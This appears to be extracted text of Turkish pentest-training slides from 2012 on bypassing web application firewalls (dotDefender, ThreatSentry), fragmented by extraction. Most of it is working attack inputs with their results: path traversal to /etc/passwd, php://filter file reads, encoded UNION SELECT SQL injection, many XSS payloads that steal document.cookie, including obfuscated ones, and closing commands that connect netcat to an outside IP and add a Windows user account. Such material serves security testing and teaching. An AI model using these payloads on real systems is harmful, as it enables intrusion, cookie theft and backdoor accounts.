Professional Documents
Culture Documents
Bypass
http://www.bga.com.tr
bilgi@bga.com.tr
• mehmet.ince@bga.com.tr
dotDefender MySQL
CentOS 5.x Centos 5.x
Pentester ModSecurity
CentOS 5.x
• http://www.applicure.com/
• Test Ortamı:
• CentOS 5.8 i386 sanal makine
• CentOS Full update
• Lisanslı dotDefender ve full update!
• Input : ../config.php
• Input : /etc/passwd
• Input : ../../../../../../../../../etc/passwd
• WAF detected!
WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
Applicure dotDefender – File Inclusion
Saldırıyı engelleyen
kural.
• Input : php://filter/read=convert.base64-
encode/resource=/etc/passwd
• WAF trigger edilmedi
• Input =
UNION%0DALL%0DSELECT%0DNULL,NULL,@
@SERVERNAME
• WIN-UYB0EA2LDB6
WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
Applicure dotDefender – XSS
• Input = <script>
• Waf Blocked!
• Input = alert()
• Waf Blocked!
• Input = prompt()
WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
Applicure dotDefender – XSS
• ThreatSentry
• http://www.privacyware.com/intrusion_preve
ntion.html
• Test Ortamı:
• Windows Server 2003 32bit sanal makine
• Full Windows update
• Tüm özellikleri aktif, 30 günlük test sürümü.
• Input : ../config.php
• Input : ../../../../../../../../../
• WAF tespit edemedi.
• Input : php://filter/read=convert.base64-
encode/resource=/etc/passwd
• WAF blocked!
• Input =
UNION%0DALL%0DSELECT%0DNULL,NULL,DB
_NAME()
• waftest
WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
ThreatSentry – XSS
• Input = <script>
• Waf Blocked!
• Input = <body
oninput=prompt(document.cookie)><input
autofocus>
WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
ThreatSentry – XSS
• <img src=x:x
onerror=prompt(document.cookie)//>
• <link rel=stylesheet
href=data:,*%7bx:expression(write(1))%7d
• <input onfocus=write(1) autofocus>
• <video
onerror="javascript:alert(1)"><source></sourc
e></video>
• <body oninput=prompt(1)><input autofocus>
• <frameset onload=prompt(1)>
WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
ThreatSentry – XSS
• <object
data="data:text/html;base64,PHNjcmlwdD5hb
GVydCgxKTwvc2NyaXB0Pg=="></object>
• <embed
src="data:text/html;base64,PHNjcmlwdD5hbG
VydCgxKTwvc2NyaXB0Pg=="></embed>
• ({})[$='\143\157\156\163\164\162\165\143\
164\157\162'][$]('\141\154\145\162\164\50
document.cookie\51')()
• Cmd.exe /C dir
• nc.exe 123.123.123.123
• net user mince M1nc3 /add